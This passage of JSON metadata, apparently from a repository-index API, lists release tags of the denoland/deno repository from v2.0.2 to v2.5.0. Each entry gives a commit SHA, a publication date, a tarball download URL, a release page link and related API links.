T05:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"b7061b0f64b3c79b312de5a59122b7184b2fdef2","kind":"commit","published_at":"2025-08-21T11:41:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5/manifests"},{"name":"v2.4.4","sha":"5129d036ebd51b229adb7579e2c805859e3f95c0","kind":"commit","published_at":"2025-08-13T20:26:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4/manifests"},{"name":"v2.4.3","sha":"5612d2edc7262d7bfb3bcfb0f18649b01ec94b53","kind":"commit","published_at":"2025-07-30T22:25:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"622c3513936c1614ee316516a31343729c3c4367","kind":"commit","published_at":"2025-07-16T10:51:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2/manifests"},{"name":"v2.2.14","sha":"ec5368efefd1fbdfe0c83a20237b5117d1291c11","kind":"commit","published_at":"2025-07-16T09:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14/manifests"},{"name":"v2.4.1","sha":"c03199ea1e4e22d44aad0deafc634be82e5b841b","kind":"commit","published_at":"2025-07-08T05:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"45dfae18eec45c91146231aa05f4b249378691b5","kind":"commit","published_at":"2025-07-01T20:21:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0/manifests"},{"name":"v2.3.7","sha":"0d76cd50af2b21e0ac772bb5219199e32a8f312d","kind":"commit","published_at":"2025-06-23T21:51:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7/manifests"},{"name":"v2.3.6","sha":"d2d8d3775fe0fbb34de08421f612ded43dea4473","kind":"commit","published_at":"2025-06-12T12:33:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6/manifests"},{"name":"v2.3.5","sha":"4794dc147e51c75cfa501d39da72cbd0ecb9b068","kind":"commit","published_at":"2025-05-30T11:01:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5/manifests"},{"name":"v2.3.4","sha":"37ba6223b6733c4b18d4727c23f6831558c0ccc8","kind":"commit","published_at":"2025-05-29T22:48:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4/manifests"},{"name":"v2.3.3","sha":"395878c5fb72d87a44f7c88ce9f391acc31feab3","kind":"commit","published_at":"2025-05-16T11:37:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"7b74f385396bded16f99db64b97aa48e6f603f16","kind":"commit","published_at":"2025-05-15T23:18:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2/manifests"},{"name":"v2.2.13","sha":"0117f27aef98e1bf9a8689fe5ab6b03b5a1453f7","kind":"commit","published_at":"2025-05-13T20:00:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13/manifests"},{"name":"v2.1.13","sha":"5b85bdaf88e36a1fcae3e442d96f026e4e1f9b92","kind":"commit","published_at":"2025-05-13T19:41:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13/manifests"},{"name":"v2.3.1","sha":"8773b5f5b074e1e374a403d05943b6a7bbbdebad","kind":"commit","published_at":"2025-04-30T10:48:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"61574bb9c9c255d5c661add6c7464af30475c197","kind":"commit","published_at":"2025-04-30T07:49:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0/manifests"},{"name":"v2.2.12","sha":"81da8139af85a0cb7efa9050ae6b5461b3614077","kind":"commit","published_at":"2025-04-24T20:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12/manifests"},{"name":"v2.2.11","sha":"225fbd59bf9a1d50603adb99fe2748edf70b9de2","kind":"commit","published_at":"2025-04-18T12:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11/manifests"},{"name":"v2.2.10","sha":"adc34a6b3b8f6ff593810c0655d0d1a4b7ea3729","kind":"commit","published_at":"2025-04-14T20:59:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10/manifests"},{"name":"v2.1.12","sha":"16b18e2b8dddde755364b740d63aa7da3646b33c","kind":"commit","published_at":"2025-04-11T23:06:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12/manifests"},{"name":"v2.2.9","sha":"25defa74d539d1d6fd27ddabd5260705677c43e8","kind":"commit","published_at":"2025-04-11T18:52:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9/manifests"},{"name":"v2.1.11","sha":"d73d467148cff810ccf9c96bed9bcaf32ce5281c","kind":"commit","published_at":"2025-04-08T23:54:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11/manifests"},{"name":"v2.2.8","sha":"32b9cc91d8c343bdec2ddcf3cedb27b5efc2f5e4","kind":"commit","published_at":"2025-04-05T01:17:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8/manifests"},{"name":"v2.2.7","sha":"e7dab411533fd7240fd794398ba9d9590e28f69d","kind":"commit","published_at":"2025-04-04T08:05:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7/manifests"},{"name":"v2.2.6","sha":"2037200c4bc903162cd16b71b2564ab5bcd0601e","kind":"commit","published_at":"2025-03-28T05:25:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6/manifests"},{"name":"v2.2.5","sha":"6e08a9d2291cf45ae4031e163b8c1a03a0e85983","kind":"commit","published_at":"2025-03-21T05:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5/manifests"},{"name":"v2.2.4","sha":"33132abbd9ee0defa4bf0332c4797ee4341a03fc","kind":"commit","published_at":"2025-03-14T19:06:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4/manifests"},{"name":"v2.2.3","sha":"8203278401f4ffcb477a28b3ae9b915d88de7dd7","kind":"commit","published_at":"2025-03-05T04:00:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3/manifests"},{"name":"v2.2.2","sha":"b2e5efd3826974857f4e5a94d87c2c724fa5bf5d","kind":"commit","published_at":"2025-02-25T07:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2/manifests"},{"name":"v2.2.1","sha":"6057bc30da1df2b247f584b5280e1f10c02eec75","kind":"commit","published_at":"2025-02-20T23:41:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"29688168631edb677a444ba3cd02b2be21304a1f","kind":"commit","published_at":"2025-02-18T23:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0/manifests"},{"name":"v2.1.10","sha":"073e0879791486f70c7ac99d2d100c3fca6ac461","kind":"commit","published_at":"2025-02-13T06:33:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10/manifests"},{"name":"v2.1.9","sha":"46e2f9a47ee5293547efd089438db29690a05f85","kind":"commit","published_at":"2025-01-31T00:21:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9/manifests"},{"name":"v2.1.8","sha":"318646f7678111d24b139f4c589a4ef447c8cf1c","kind":"commit","published_at":"2025-01-30T18:19:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8/manifests"},{"name":"v2.1.7","sha":"379079d9049499af660b70423aa7cc3aca0d5e52","kind":"commit","published_at":"2025-01-22T00:51:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7/manifests"},{"name":"v2.1.6","sha":"4ee86d8d125c7b36570e87f0725eb82b6fe4a4b4","kind":"commit","published_at":"2025-01-16T23:35:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6/manifests"},{"name":"v2.1.5","sha":"d15a95e28b0ec015c2f2a88cca3882ba96d5da98","kind":"commit","published_at":"2025-01-09T20:55:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5/manifests"},{"name":"v2.1.4","sha":"b32ed7516cfdaaff76203ca530796d6a1235568d","kind":"commit","published_at":"2024-12-11T03:31:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"7f9b1ff30f7d9880b7c825c2b5f2de3137343d76","kind":"commit","published_at":"2024-12-05T23:36:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3/manifests"},{"name":"v2.1.2","sha":"2039abe8d2bc82fa800f4118707a48ac6f5e02ae","kind":"commit","published_at":"2024-11-28T15:45:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2/manifests"},{"name":"v2.1.1","sha":"5d71b461530f7c374c08701cef5678a5a4ac5484","kind":"commit","published_at":"2024-11-21T17:28:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"3da4eca7c1ed97906654671669e0bb3b095bc637","kind":"commit","published_at":"2024-11-21T02:05:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0/manifests"},{"name":"v2.0.6","sha":"8f59d18202e94e5c54ad7e5a79ec1383159e4a20","kind":"commit","published_at":"2024-11-10T04:38:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"78a799b4947461eb5c6092295cbcdabfe94053f7","kind":"commit","published_at":"2024-11-06T00:19:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"b7c282d2f80b12b0b2a435780fb0ea2b236ab224","kind":"commit","published_at":"2024-10-30T00:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"997bd47fc27ad920f3388c94a95829ff45394c84","kind":"commit","published_at":"2024-10-25T00:57:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"22a79ea420e67e783d996d5d1d64983192cb3dd8","kind":"commit","published_at":"2024-10-17T23:28:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.2","html_url":"https://github.c